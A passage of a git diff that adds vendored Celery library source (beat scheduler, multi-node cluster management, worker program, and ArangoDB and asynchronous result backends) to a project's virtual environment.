-> None: + if colorize is None and self.no_color is not None: + colorize = not self.no_color + self.app.log.setup(self.loglevel, self.logfile, + self.redirect_stdouts, self.redirect_stdouts_level, + colorize=colorize) + + def start_scheduler(self) -> None: + if self.pidfile: + 
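+            # acquire the pidfile lock first so a stale or duplicate beat
+            # instance is detected before the service starts.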
platforms.create_pidlock(self.pidfile) + service = self.Service( + app=self.app, + max_interval=self.max_interval, + scheduler_cls=self.scheduler_cls, + schedule_filename=self.schedule, + ) + + if not self.quiet: + print(self.banner(service)) + + self.setup_logging() + if self.socket_timeout: + logger.debug('Setting default socket timeout to %r', + self.socket_timeout) + socket.setdefaulttimeout(self.socket_timeout) + try: + self.install_sync_handler(service) + service.start() + except Exception as exc: + logger.critical('beat raised exception %s: %r', + exc.__class__, exc, + exc_info=True) + raise + + def banner(self, service: beat.Service) -> str: + c = self.colored + return str( + c.blue('__ ', c.magenta('-'), + c.blue(' ... __ '), c.magenta('-'), + c.blue(' _\n'), + c.reset(self.startup_info(service))), + ) + + def init_loader(self) -> None: + # Run the worker init handler. + # (Usually imports task modules and such.) + self.app.loader.init_worker() + self.app.finalize() + + def startup_info(self, service: beat.Service) -> str: + scheduler = service.get_scheduler(lazy=True) + return STARTUP_INFO_FMT.format( + conninfo=self.app.connection().as_uri(), + timestamp=datetime.now().replace(microsecond=0), + logfile=self.logfile or '[stderr]', + loglevel=LOG_LEVELS[self.loglevel], + loader=qualname(self.app.loader), + scheduler=qualname(scheduler), + scheduler_info=scheduler.info, + hmax_interval=humanize_seconds(scheduler.max_interval), + max_interval=scheduler.max_interval, + ) + + def set_process_title(self) -> None: + arg_start = 'manage' in sys.argv[0] and 2 or 1 + platforms.set_process_title( + 'celery beat', info=' '.join(sys.argv[arg_start:]), + ) + + def install_sync_handler(self, service: beat.Service) -> None: + """Install a `SIGTERM` + `SIGINT` handler saving the schedule.""" + def _sync(signum: Signals, frame: FrameType) -> None: + service.sync() + raise SystemExit() + platforms.signals.update(SIGTERM=_sync, SIGINT=_sync) diff --git a/env/Lib/site-packages/celery/apps/multi.py b/env/Lib/site-packages/celery/apps/multi.py new file mode 100644 index 00000000..1fe60042 --- /dev/null +++ b/env/Lib/site-packages/celery/apps/multi.py @@ -0,0 +1,506 @@ +"""Start/stop/manage workers.""" +import errno +import os +import shlex +import signal +import sys +from collections import OrderedDict, UserList, defaultdict +from functools import partial +from subprocess import Popen +from time import sleep + +from kombu.utils.encoding import from_utf8 +from kombu.utils.objects import cached_property + +from celery.platforms import IS_WINDOWS, Pidfile, signal_name +from celery.utils.nodenames import gethostname, host_format, node_format, nodesplit +from celery.utils.saferepr import saferepr + +__all__ = ('Cluster', 'Node') + +CELERY_EXE = 'celery' + + +def celery_exe(*args): + return ' '.join((CELERY_EXE,) + args) + + +def build_nodename(name, prefix, suffix): + hostname = suffix + if '@' in name: + nodename = host_format(name) + shortname, hostname = nodesplit(nodename) + name = shortname + else: + shortname = f'{prefix}{name}' + nodename = host_format( + f'{shortname}@{hostname}', + ) + return name, nodename, hostname + + +def build_expander(nodename, shortname, hostname): + return partial( + node_format, + name=nodename, + N=shortname, + d=hostname, + h=nodename, + i='%i', + I='%I', + ) + + +def format_opt(opt, value): + if not value: + return opt + if opt.startswith('--'): + return f'{opt}={value}' + return f'{opt} {value}' + + +def _kwargs_to_command_line(kwargs): + return { + 
('--{}'.format(k.replace('_', '-')) + if len(k) > 1 else f'-{k}'): f'{v}' + for k, v in kwargs.items() + } + + +class NamespacedOptionParser: + + def __init__(self, args): + self.args = args + self.options = OrderedDict() + self.values = [] + self.passthrough = '' + self.namespaces = defaultdict(lambda: OrderedDict()) + + def parse(self): + rargs = [arg for arg in self.args if arg] + pos = 0 + while pos < len(rargs): + arg = rargs[pos] + if arg == '--': + self.passthrough = ' '.join(rargs[pos:]) + break + elif arg[0] == '-': + if arg[1] == '-': + self.process_long_opt(arg[2:]) + else: + value = None + if len(rargs) > pos + 1 and rargs[pos + 1][0] != '-': + value = rargs[pos + 1] + pos += 1 + self.process_short_opt(arg[1:], value) + else: + self.values.append(arg) + pos += 1 + + def process_long_opt(self, arg, value=None): + if '=' in arg: + arg, value = arg.split('=', 1) + self.add_option(arg, value, short=False) + + def process_short_opt(self, arg, value=None): + self.add_option(arg, value, short=True) + + def optmerge(self, ns, defaults=None): + if defaults is None: + defaults = self.options + return OrderedDict(defaults, **self.namespaces[ns]) + + def add_option(self, name, value, short=False, ns=None): + prefix = short and '-' or '--' + dest = self.options + if ':' in name: + name, ns = name.split(':') + dest = self.namespaces[ns] + dest[prefix + name] = value + + +class Node: + """Represents a node in a cluster.""" + + def __init__(self, name, + cmd=None, append=None, options=None, extra_args=None): + self.name = name + self.cmd = cmd or f"-m {celery_exe('worker', '--detach')}" + self.append = append + self.extra_args = extra_args or '' + self.options = self._annotate_with_default_opts( + options or OrderedDict()) + self.expander = self._prepare_expander() + self.argv = self._prepare_argv() + self._pid = None + + def _annotate_with_default_opts(self, options): + options['-n'] = self.name + self._setdefaultopt(options, ['--pidfile', '-p'], '/var/run/celery/%n.pid') + self._setdefaultopt(options, ['--logfile', '-f'], '/var/log/celery/%n%I.log') + self._setdefaultopt(options, ['--executable'], sys.executable) + return options + + def _setdefaultopt(self, d, alt, value): + for opt in alt[1:]: + try: + return d[opt] + except KeyError: + pass + value = d.setdefault(alt[0], os.path.normpath(value)) + dir_path = os.path.dirname(value) + if dir_path and not os.path.exists(dir_path): + os.makedirs(dir_path) + return value + + def _prepare_expander(self): + shortname, hostname = self.name.split('@', 1) + return build_expander( + self.name, shortname, hostname) + + def _prepare_argv(self): + cmd = self.expander(self.cmd).split(' ') + i = cmd.index('celery') + 1 + + options = self.options.copy() + for opt, value in self.options.items(): + if opt in ( + '-A', '--app', + '-b', '--broker', + '--result-backend', + '--loader', + '--config', + '--workdir', + '-C', '--no-color', + '-q', '--quiet', + ): + cmd.insert(i, format_opt(opt, self.expander(value))) + + options.pop(opt) + + cmd = [' '.join(cmd)] + argv = tuple( + cmd + + [format_opt(opt, self.expander(value)) + for opt, value in options.items()] + + [self.extra_args] + ) + if self.append: + argv += (self.expander(self.append),) + return argv + + def alive(self): + return self.send(0) + + def send(self, sig, on_error=None): + pid = self.pid + if pid: + try: + os.kill(pid, sig) + except OSError as exc: + if exc.errno != errno.ESRCH: + raise + maybe_call(on_error, self) + return False + return True + maybe_call(on_error, self) + + def start(self, 
env=None, **kwargs): + return self._waitexec( + self.argv, path=self.executable, env=env, **kwargs) + + def _waitexec(self, argv, path=sys.executable, env=None, + on_spawn=None, on_signalled=None, on_failure=None): + argstr = self.prepare_argv(argv, path) + maybe_call(on_spawn, self, argstr=' '.join(argstr), env=env) + pipe = Popen(argstr, env=env) + return self.handle_process_exit( + pipe.wait(), + on_signalled=on_signalled, + on_failure=on_failure, + ) + + def handle_process_exit(self, retcode, on_signalled=None, on_failure=None): + if retcode < 0: + maybe_call(on_signalled, self, -retcode) + return -retcode + elif retcode > 0: + maybe_call(on_failure, self, retcode) + return retcode + + def prepare_argv(self, argv, path): + args = ' '.join([path] + list(argv)) + return shlex.split(from_utf8(args), posix=not IS_WINDOWS) + + def getopt(self, *alt): + for opt in alt: + try: + return self.options[opt] + except KeyError: + pass + raise KeyError(alt[0]) + + def __repr__(self): + return f'<{type(self).__name__}: {self.name}>' + + @cached_property + def pidfile(self): + return self.expander(self.getopt('--pidfile', '-p')) + + @cached_property + def logfile(self): + return self.expander(self.getopt('--logfile', '-f')) + + @property + def pid(self): + if self._pid is not None: + return self._pid + try: + return Pidfile(self.pidfile).read_pid() + except ValueError: + pass + + @pid.setter + def pid(self, value): + self._pid = value + + @cached_property + def executable(self): + return self.options['--executable'] + + @cached_property + def argv_with_executable(self): + return (self.executable,) + self.argv + + @classmethod + def from_kwargs(cls, name, **kwargs): + return cls(name, options=_kwargs_to_command_line(kwargs)) + + +def maybe_call(fun, *args, **kwargs): + if fun is not None: + fun(*args, **kwargs) + + +class MultiParser: + Node = Node + + def __init__(self, cmd='celery worker', + append='', prefix='', suffix='', + range_prefix='celery'): + self.cmd = cmd + self.append = append + self.prefix = prefix + self.suffix = suffix + self.range_prefix = range_prefix + + def parse(self, p): + names = p.values + options = dict(p.options) + ranges = len(names) == 1 + prefix = self.prefix + cmd = options.pop('--cmd', self.cmd) + append = options.pop('--append', self.append) + hostname = options.pop('--hostname', options.pop('-n', gethostname())) + prefix = options.pop('--prefix', prefix) or '' + suffix = options.pop('--suffix', self.suffix) or hostname + suffix = '' if suffix in ('""', "''") else suffix + range_prefix = options.pop('--range-prefix', '') or self.range_prefix + if ranges: + try: + names, prefix = self._get_ranges(names), range_prefix + except ValueError: + pass + self._update_ns_opts(p, names) + self._update_ns_ranges(p, ranges) + + return ( + self._node_from_options( + p, name, prefix, suffix, cmd, append, options) + for name in names + ) + + def _node_from_options(self, p, name, prefix, + suffix, cmd, append, options): + namespace, nodename, _ = build_nodename(name, prefix, suffix) + namespace = nodename if nodename in p.namespaces else namespace + return Node(nodename, cmd, append, + p.optmerge(namespace, options), p.passthrough) + + def _get_ranges(self, names): + noderange = int(names[0]) + return [str(n) for n in range(1, noderange + 1)] + + def _update_ns_opts(self, p, names): + # Numbers in args always refers to the index in the list of names. + # (e.g., `start foo bar baz -c:1` where 1 is foo, 2 is bar, and so on). 
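# Illustrative sketch, not part of the vendored source: for an invocation
# like `start foo bar baz -c 2 -c:1 4`, NamespacedOptionParser keeps
# {'-c': '2'} as the default options and {'-c': '4'} under namespace '1';
# the loop below copies that namespace onto 'foo', so foo's node is started
# with -c 4 while bar and baz fall back to the default -c 2.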
+ for ns_name, ns_opts in list(p.namespaces.items()): + if ns_name.isdigit(): + ns_index = int(ns_name) - 1 + if ns_index < 0: + raise KeyError(f'Indexes start at 1 got: {ns_name!r}') + try: + p.namespaces[names[ns_index]].update(ns_opts) + except IndexError: + raise KeyError(f'No node at index {ns_name!r}') + + def _update_ns_ranges(self, p, ranges): + for ns_name, ns_opts in list(p.namespaces.items()): + if ',' in ns_name or (ranges and '-' in ns_name): + for subns in self._parse_ns_range(ns_name, ranges): + p.namespaces[subns].update(ns_opts) + p.namespaces.pop(ns_name) + + def _parse_ns_range(self, ns, ranges=False): + ret = [] + for space in ',' in ns and ns.split(',') or [ns]: + if ranges and '-' in space: + start, stop = space.split('-') + ret.extend( + str(n) for n in range(int(start), int(stop) + 1) + ) + else: + ret.append(space) + return ret + + +class Cluster(UserList): + """Represent a cluster of workers.""" + + def __init__(self, nodes, cmd=None, env=None, + on_stopping_preamble=None, + on_send_signal=None, + on_still_waiting_for=None, + on_still_waiting_progress=None, + on_still_waiting_end=None, + on_node_start=None, + on_node_restart=None, + on_node_shutdown_ok=None, + on_node_status=None, + on_node_signal=None, + on_node_signal_dead=None, + on_node_down=None, + on_child_spawn=None, + on_child_signalled=None, + on_child_failure=None): + self.nodes = nodes + self.cmd = cmd or celery_exe('worker') + self.env = env + + self.on_stopping_preamble = on_stopping_preamble + self.on_send_signal = on_send_signal + self.on_still_waiting_for = on_still_waiting_for + self.on_still_waiting_progress = on_still_waiting_progress + self.on_still_waiting_end = on_still_waiting_end + self.on_node_start = on_node_start + self.on_node_restart = on_node_restart + self.on_node_shutdown_ok = on_node_shutdown_ok + self.on_node_status = on_node_status + self.on_node_signal = on_node_signal + self.on_node_signal_dead = on_node_signal_dead + self.on_node_down = on_node_down + self.on_child_spawn = on_child_spawn + self.on_child_signalled = on_child_signalled + self.on_child_failure = on_child_failure + + def start(self): + return [self.start_node(node) for node in self] + + def start_node(self, node): + maybe_call(self.on_node_start, node) + retcode = self._start_node(node) + maybe_call(self.on_node_status, node, retcode) + return retcode + + def _start_node(self, node): + return node.start( + self.env, + on_spawn=self.on_child_spawn, + on_signalled=self.on_child_signalled, + on_failure=self.on_child_failure, + ) + + def send_all(self, sig): + for node in self.getpids(on_down=self.on_node_down): + maybe_call(self.on_node_signal, node, signal_name(sig)) + node.send(sig, self.on_node_signal_dead) + + def kill(self): + return self.send_all(signal.SIGKILL) + + def restart(self, sig=signal.SIGTERM): + retvals = [] + + def restart_on_down(node): + maybe_call(self.on_node_restart, node) + retval = self._start_node(node) + maybe_call(self.on_node_status, node, retval) + retvals.append(retval) + + self._stop_nodes(retry=2, on_down=restart_on_down, sig=sig) + return retvals + + def stop(self, retry=None, callback=None, sig=signal.SIGTERM): + return self._stop_nodes(retry=retry, on_down=callback, sig=sig) + + def stopwait(self, retry=2, callback=None, sig=signal.SIGTERM): + return self._stop_nodes(retry=retry, on_down=callback, sig=sig) + + def _stop_nodes(self, retry=None, on_down=None, sig=signal.SIGTERM): + on_down = on_down if on_down is not None else self.on_node_down + nodes = 
list(self.getpids(on_down=on_down)) + if nodes: + for node in self.shutdown_nodes(nodes, sig=sig, retry=retry): + maybe_call(on_down, node) + + def shutdown_nodes(self, nodes, sig=signal.SIGTERM, retry=None): + P = set(nodes) + maybe_call(self.on_stopping_preamble, nodes) + to_remove = set() + for node in P: + maybe_call(self.on_send_signal, node, signal_name(sig)) + if not node.send(sig, self.on_node_signal_dead): + to_remove.add(node) + yield node + P -= to_remove + if retry: + maybe_call(self.on_still_waiting_for, P) + its = 0 + while P: + to_remove = set() + for node in P: + its += 1 + maybe_call(self.on_still_waiting_progress, P) + if not node.alive(): + maybe_call(self.on_node_shutdown_ok, node) + to_remove.add(node) + yield node + maybe_call(self.on_still_waiting_for, P) + break + P -= to_remove + if P and not its % len(P): + sleep(float(retry)) + maybe_call(self.on_still_waiting_end) + + def find(self, name): + for node in self: + if node.name == name: + return node + raise KeyError(name) + + def getpids(self, on_down=None): + for node in self: + if node.pid: + yield node + else: + maybe_call(on_down, node) + + def __repr__(self): + return '<{name}({0}): {1}>'.format( + len(self), saferepr([n.name for n in self]), + name=type(self).__name__, + ) + + @property + def data(self): + return self.nodes diff --git a/env/Lib/site-packages/celery/apps/worker.py b/env/Lib/site-packages/celery/apps/worker.py new file mode 100644 index 00000000..dcc04dac --- /dev/null +++ b/env/Lib/site-packages/celery/apps/worker.py @@ -0,0 +1,387 @@ +"""Worker command-line program. + +This module is the 'program-version' of :mod:`celery.worker`. + +It does everything necessary to run that module +as an actual application, like installing signal handlers, +platform tweaks, and so on. 
+""" +import logging +import os +import platform as _platform +import sys +from datetime import datetime +from functools import partial + +from billiard.common import REMAP_SIGTERM +from billiard.process import current_process +from kombu.utils.encoding import safe_str + +from celery import VERSION_BANNER, platforms, signals +from celery.app import trace +from celery.loaders.app import AppLoader +from celery.platforms import EX_FAILURE, EX_OK, check_privileges +from celery.utils import static, term +from celery.utils.debug import cry +from celery.utils.imports import qualname +from celery.utils.log import get_logger, in_sighandler, set_in_sighandler +from celery.utils.text import pluralize +from celery.worker import WorkController + +__all__ = ('Worker',) + +logger = get_logger(__name__) +is_jython = sys.platform.startswith('java') +is_pypy = hasattr(sys, 'pypy_version_info') + +ARTLINES = [ + ' --------------', + '--- ***** -----', + '-- ******* ----', + '- *** --- * ---', + '- ** ----------', + '- ** ----------', + '- ** ----------', + '- ** ----------', + '- *** --- * ---', + '-- ******* ----', + '--- ***** -----', + ' --------------', +] + +BANNER = """\ +{hostname} v{version} + +{platform} {timestamp} + +[config] +.> app: {app} +.> transport: {conninfo} +.> results: {results} +.> concurrency: {concurrency} +.> task events: {events} + +[queues] +{queues} +""" + +EXTRA_INFO_FMT = """ +[tasks] +{tasks} +""" + + +def active_thread_count(): + from threading import enumerate + return sum(1 for t in enumerate() + if not t.name.startswith('Dummy-')) + + +def safe_say(msg): + print(f'\n{msg}', file=sys.__stderr__, flush=True) + + +class Worker(WorkController): + """Worker as a program.""" + + def on_before_init(self, quiet=False, **kwargs): + self.quiet = quiet + trace.setup_worker_optimizations(self.app, self.hostname) + + # this signal can be used to set up configuration for + # workers by name. + signals.celeryd_init.send( + sender=self.hostname, instance=self, + conf=self.app.conf, options=kwargs, + ) + check_privileges(self.app.conf.accept_content) + + def on_after_init(self, purge=False, no_color=None, + redirect_stdouts=None, redirect_stdouts_level=None, + **kwargs): + self.redirect_stdouts = self.app.either( + 'worker_redirect_stdouts', redirect_stdouts) + self.redirect_stdouts_level = self.app.either( + 'worker_redirect_stdouts_level', redirect_stdouts_level) + super().setup_defaults(**kwargs) + self.purge = purge + self.no_color = no_color + self._isatty = sys.stdout.isatty() + self.colored = self.app.log.colored( + self.logfile, + enabled=not no_color if no_color is not None else no_color + ) + + def on_init_blueprint(self): + self._custom_logging = self.setup_logging() + # apply task execution optimizations + # -- This will finalize the app! + trace.setup_worker_optimizations(self.app, self.hostname) + + def on_start(self): + app = self.app + super().on_start() + + # this signal can be used to, for example, change queues after + # the -Q option has been applied. + signals.celeryd_after_setup.send( + sender=self.hostname, instance=self, conf=app.conf, + ) + + if self.purge: + self.purge_messages() + + if not self.quiet: + self.emit_banner() + + self.set_process_status('-active-') + self.install_platform_tweaks(self) + if not self._custom_logging and self.redirect_stdouts: + app.log.redirect_stdouts(self.redirect_stdouts_level) + + # TODO: Remove the following code in Celery 6.0 + # This qualifies as a hack for issue #6366. 
+ warn_deprecated = True + config_source = app._config_source + if isinstance(config_source, str): + # Don't raise the warning when the settings originate from + # django.conf:settings + warn_deprecated = config_source.lower() not in [ + 'django.conf:settings', + ] + + if warn_deprecated: + if app.conf.maybe_warn_deprecated_settings(): + logger.warning( + "Please run `celery upgrade settings path/to/settings.py` " + "to avoid these warnings and to allow a smoother upgrade " + "to Celery 6.0." + ) + + def emit_banner(self): + # Dump configuration to screen so we have some basic information + # for when users sends bug reports. + use_image = term.supports_images() + if use_image: + print(term.imgcat(static.logo())) + print(safe_str(''.join([ + str(self.colored.cyan( + ' \n', self.startup_info(artlines=not use_image))), + str(self.colored.reset(self.extra_info() or '')), + ])), file=sys.__stdout__, flush=True) + + def on_consumer_ready(self, consumer): + signals.worker_ready.send(sender=consumer) + logger.info('%s ready.', safe_str(self.hostname)) + + def setup_logging(self, colorize=None): + if colorize is None and self.no_color is not None: + colorize = not self.no_color + return self.app.log.setup( + self.loglevel, self.logfile, + redirect_stdouts=False, colorize=colorize, hostname=self.hostname, + ) + + def purge_messages(self): + with self.app.connection_for_write() as connection: + count = self.app.control.purge(connection=connection) + if count: # pragma: no cover + print(f"purge: Erased {count} {pluralize(count, 'message')} from the queue.\n", flush=True) + + def tasklist(self, include_builtins=True, sep='\n', int_='celery.'): + return sep.join( + f' . {task}' for task in sorted(self.app.tasks) + if (not task.startswith(int_) if not include_builtins else task) + ) + + def extra_info(self): + if self.loglevel is None: + return + if self.loglevel <= logging.INFO: + include_builtins = self.loglevel <= logging.DEBUG + tasklist = self.tasklist(include_builtins=include_builtins) + return EXTRA_INFO_FMT.format(tasks=tasklist) + + def startup_info(self, artlines=True): + app = self.app + concurrency = str(self.concurrency) + appr = '{}:{:#x}'.format(app.main or '__main__', id(app)) + if not isinstance(app.loader, AppLoader): + loader = qualname(app.loader) + if loader.startswith('celery.loaders'): # pragma: no cover + loader = loader[14:] + appr += f' ({loader})' + if self.autoscale: + max, min = self.autoscale + concurrency = f'{{min={min}, max={max}}}' + pool = self.pool_cls + if not isinstance(pool, str): + pool = pool.__module__ + concurrency += f" ({pool.split('.')[-1]})" + events = 'ON' + if not self.task_events: + events = 'OFF (enable -E to monitor tasks in this worker)' + + banner = BANNER.format( + app=appr, + hostname=safe_str(self.hostname), + timestamp=datetime.now().replace(microsecond=0), + version=VERSION_BANNER, + conninfo=self.app.connection().as_uri(), + results=self.app.backend.as_uri(), + concurrency=concurrency, + platform=safe_str(_platform.platform()), + events=events, + queues=app.amqp.queues.format(indent=0, indent_first=False), + ).splitlines() + + # integrate the ASCII art. 
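# Illustrative note, not part of the vendored source: each banner line i is
# joined with ARTLINES[i] by a single space, i.e. ' '.join([ARTLINES[i], line]);
# once ARTLINES is exhausted (IndexError) the remaining banner lines are padded
# with sixteen spaces so the text column stays aligned with the art.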
+ if artlines: + for i, _ in enumerate(banner): + try: + banner[i] = ' '.join([ARTLINES[i], banner[i]]) + except IndexError: + banner[i] = ' ' * 16 + banner[i] + return '\n'.join(banner) + '\n' + + def install_platform_tweaks(self, worker): + """Install platform specific tweaks and workarounds.""" + if self.app.IS_macOS: + self.macOS_proxy_detection_workaround() + + # Install signal handler so SIGHUP restarts the worker. + if not self._isatty: + # only install HUP handler if detached from terminal, + # so closing the terminal window doesn't restart the worker + # into the background. + if self.app.IS_macOS: + # macOS can't exec from a process using threads. + # See https://github.com/celery/celery/issues#issue/152 + install_HUP_not_supported_handler(worker) + else: + install_worker_restart_handler(worker) + install_worker_term_handler(worker) + install_worker_term_hard_handler(worker) + install_worker_int_handler(worker) + install_cry_handler() + install_rdb_handler() + + def macOS_proxy_detection_workaround(self): + """See https://github.com/celery/celery/issues#issue/161.""" + os.environ.setdefault('celery_dummy_proxy', 'set_by_celeryd') + + def set_process_status(self, info): + return platforms.set_mp_process_title( + 'celeryd', + info=f'{info} ({platforms.strargv(sys.argv)})', + hostname=self.hostname, + ) + + +def _shutdown_handler(worker, sig='TERM', how='Warm', + callback=None, exitcode=EX_OK): + def _handle_request(*args): + with in_sighandler(): + from celery.worker import state + if current_process()._name == 'MainProcess': + if callback: + callback(worker) + safe_say(f'worker: {how} shutdown (MainProcess)') + signals.worker_shutting_down.send( + sender=worker.hostname, sig=sig, how=how, + exitcode=exitcode, + ) + setattr(state, {'Warm': 'should_stop', + 'Cold': 'should_terminate'}[how], exitcode) + _handle_request.__name__ = str(f'worker_{how}') + platforms.signals[sig] = _handle_request + + +if REMAP_SIGTERM == "SIGQUIT": + install_worker_term_handler = partial( + _shutdown_handler, sig='SIGTERM', how='Cold', exitcode=EX_FAILURE, + ) +else: + install_worker_term_handler = partial( + _shutdown_handler, sig='SIGTERM', how='Warm', + ) + +if not is_jython: # pragma: no cover + install_worker_term_hard_handler = partial( + _shutdown_handler, sig='SIGQUIT', how='Cold', + exitcode=EX_FAILURE, + ) +else: # pragma: no cover + install_worker_term_handler = \ + install_worker_term_hard_handler = lambda *a, **kw: None + + +def on_SIGINT(worker): + safe_say('worker: Hitting Ctrl+C again will terminate all running tasks!') + install_worker_term_hard_handler(worker, sig='SIGINT') + + +if not is_jython: # pragma: no cover + install_worker_int_handler = partial( + _shutdown_handler, sig='SIGINT', callback=on_SIGINT, + exitcode=EX_FAILURE, + ) +else: # pragma: no cover + def install_worker_int_handler(*args, **kwargs): + pass + + +def _reload_current_worker(): + platforms.close_open_fds([ + sys.__stdin__, sys.__stdout__, sys.__stderr__, + ]) + os.execv(sys.executable, [sys.executable] + sys.argv) + + +def install_worker_restart_handler(worker, sig='SIGHUP'): + + def restart_worker_sig_handler(*args): + """Signal handler restarting the current python program.""" + set_in_sighandler(True) + safe_say(f"Restarting celery worker ({' '.join(sys.argv)})") + import atexit + atexit.register(_reload_current_worker) + from celery.worker import state + state.should_stop = EX_OK + platforms.signals[sig] = restart_worker_sig_handler + + +def install_cry_handler(sig='SIGUSR1'): + # PyPy does not have 
sys._current_frames + if is_pypy: # pragma: no cover + return + + def cry_handler(*args): + """Signal handler logging the stack-trace of all active threads.""" + with in_sighandler(): + safe_say(cry()) + platforms.signals[sig] = cry_handler + + +def install_rdb_handler(envvar='CELERY_RDBSIG', + sig='SIGUSR2'): # pragma: no cover + + def rdb_handler(*args): + """Signal handler setting a rdb breakpoint at the current frame.""" + with in_sighandler(): + from celery.contrib.rdb import _frame, set_trace + + # gevent does not pass standard signal handler args + frame = args[1] if args else _frame().f_back + set_trace(frame) + if os.environ.get(envvar): + platforms.signals[sig] = rdb_handler + + +def install_HUP_not_supported_handler(worker, sig='SIGHUP'): + + def warn_on_HUP_handler(signum, frame): + with in_sighandler(): + safe_say('{sig} not supported: Restarting with {sig} is ' + 'unstable on this platform!'.format(sig=sig)) + platforms.signals[sig] = warn_on_HUP_handler diff --git a/env/Lib/site-packages/celery/backends/__init__.py b/env/Lib/site-packages/celery/backends/__init__.py new file mode 100644 index 00000000..ae2b485a --- /dev/null +++ b/env/Lib/site-packages/celery/backends/__init__.py @@ -0,0 +1 @@ +"""Result Backends.""" diff --git a/env/Lib/site-packages/celery/backends/arangodb.py b/env/Lib/site-packages/celery/backends/arangodb.py new file mode 100644 index 00000000..cc9cc48d --- /dev/null +++ b/env/Lib/site-packages/celery/backends/arangodb.py @@ -0,0 +1,190 @@ +"""ArangoDb result store backend.""" + +# pylint: disable=W1202,W0703 + +from datetime import timedelta + +from kombu.utils.objects import cached_property +from kombu.utils.url import _parse_url + +from celery.exceptions import ImproperlyConfigured + +from .base import KeyValueStoreBackend + +try: + from pyArango import connection as py_arango_connection + from pyArango.theExceptions import AQLQueryError +except ImportError: + py_arango_connection = AQLQueryError = None + +__all__ = ('ArangoDbBackend',) + + +class ArangoDbBackend(KeyValueStoreBackend): + """ArangoDb backend. + + Sample url + "arangodb://username:password@host:port/database/collection" + *arangodb_backend_settings* is where the settings are present + (in the app.conf) + Settings should contain the host, port, username, password, database name, + collection name else the default will be chosen. + Default database name and collection name is celery. + + Raises + ------ + celery.exceptions.ImproperlyConfigured: + if module :pypi:`pyArango` is not available. 
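    Example (illustrative values; the keys are the ones this backend reads
    from ``arangodb_backend_settings`` in ``app.conf``)::

        arangodb_backend_settings = {
            'host': 'localhost',
            'port': '8529',
            'username': 'celery_user',
            'password': 'secret',
            'database': 'celery',
            'collection': 'celery',
            'http_protocol': 'http',
            'verify': False,
        }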
+ + """ + + host = '127.0.0.1' + port = '8529' + database = 'celery' + collection = 'celery' + username = None + password = None + # protocol is not supported in backend url (http is taken as default) + http_protocol = 'http' + verify = False + + # Use str as arangodb key not bytes + key_t = str + + def __init__(self, url=None, *args, **kwargs): + """Parse the url or load the settings from settings object.""" + super().__init__(*args, **kwargs) + + if py_arango_connection is None: + raise ImproperlyConfigured( + 'You need to install the pyArango library to use the ' + 'ArangoDb backend.', + ) + + self.url = url + + if url is None: + host = port = database = collection = username = password = None + else: + ( + _schema, host, port, username, password, + database_collection, _query + ) = _parse_url(url) + if database_collection is None: + database = collection = None + else: + database, collection = database_collection.split('/') + + config = self.app.conf.get('arangodb_backend_settings', None) + if config is not None: + if not isinstance(config, dict): + raise ImproperlyConfigured( + 'ArangoDb backend settings should be grouped in a dict', + ) + else: + config = {} + + self.host = host or config.get('host', self.host) + self.port = int(port or config.get('port', self.port)) + self.http_protocol = config.get('http_protocol', self.http_protocol) + self.verify = config.get('verify', self.verify) + self.database = database or config.get('database', self.database) + self.collection = \ + collection or config.get('collection', self.collection) + self.username = username or config.get('username', self.username) + self.password = password or config.get('password', self.password) + self.arangodb_url = "{http_protocol}://{host}:{port}".format( + http_protocol=self.http_protocol, host=self.host, port=self.port + ) + self._connection = None + + @property + def connection(self): + """Connect to the arangodb server.""" + if self._connection is None: + self._connection = py_arango_connection.Connection( + arangoURL=self.arangodb_url, username=self.username, + password=self.password, verify=self.verify + ) + return self._connection + + @property + def db(self): + """Database Object to the given database.""" + return self.connection[self.database] + + @cached_property + def expires_delta(self): + return timedelta(seconds=0 if self.expires is None else self.expires) + + def get(self, key): + if key is None: + return None + query = self.db.AQLQuery( + "RETURN DOCUMENT(@@collection, @key).task", + rawResults=True, + bindVars={ + "@collection": self.collection, + "key": key, + }, + ) + return next(query) if len(query) > 0 else None + + def set(self, key, value): + self.db.AQLQuery( + """ + UPSERT {_key: @key} + INSERT {_key: @key, task: @value} + UPDATE {task: @value} IN @@collection + """, + bindVars={ + "@collection": self.collection, + "key": key, + "value": value, + }, + ) + + def mget(self, keys): + if keys is None: + return + query = self.db.AQLQuery( + "FOR k IN @keys RETURN DOCUMENT(@@collection, k).task", + rawResults=True, + bindVars={ + "@collection": self.collection, + "keys": keys if isinstance(keys, list) else list(keys), + }, + ) + while True: + yield from query + try: + query.nextBatch() + except StopIteration: + break + + def delete(self, key): + if key is None: + return + self.db.AQLQuery( + "REMOVE {_key: @key} IN @@collection", + bindVars={ + "@collection": self.collection, + "key": key, + }, + ) + + def cleanup(self): + if not self.expires: + return + checkpoint = (self.app.now() - 
self.expires_delta).isoformat() + self.db.AQLQuery( + """ + FOR record IN @@collection + FILTER record.task.date_done < @checkpoint + REMOVE record IN @@collection + """, + bindVars={ + "@collection": self.collection, + "checkpoint": checkpoint, + }, + ) diff --git a/env/Lib/site-packages/celery/backends/asynchronous.py b/env/Lib/site-packages/celery/backends/asynchronous.py new file mode 100644 index 00000000..cedae501 --- /dev/null +++ b/env/Lib/site-packages/celery/backends/asynchronous.py @@ -0,0 +1,333 @@ +"""Async I/O backend support utilities.""" +import socket +import threading +import time +from collections import deque +from queue import Empty +from time import sleep +from weakref import WeakKeyDictionary + +from kombu.utils.compat import detect_environment + +from celery import states +from celery.exceptions import TimeoutError +from celery.utils.threads import THREAD_TIMEOUT_MAX + +__all__ = ( + 'AsyncBackendMixin', 'BaseResultConsumer', 'Drainer', + 'register_drainer', +) + +drainers = {} + + +def register_drainer(name): + """Decorator used to register a new result drainer type.""" + def _inner(cls): + drainers[name] = cls + return cls + return _inner + + +@register_drainer('default') +class Drainer: + """Result draining service.""" + + def __init__(self, result_consumer): + self.result_consumer = result_consumer + + def start(self): + pass + + def stop(self): + pass + + def drain_events_until(self, p, timeout=None, interval=1, on_interval=None, wait=None): + wait = wait or self.result_consumer.drain_events + time_start = time.monotonic() + + while 1: + # Total time spent may exceed a single call to wait() + if timeout and time.monotonic() - time_start >= timeout: + raise socket.timeout() + try: + yield self.wait_for(p, wait, timeout=interval) + except socket.timeout: + pass + if on_interval: + on_interval() + if p.ready: # got event on the wanted channel. 
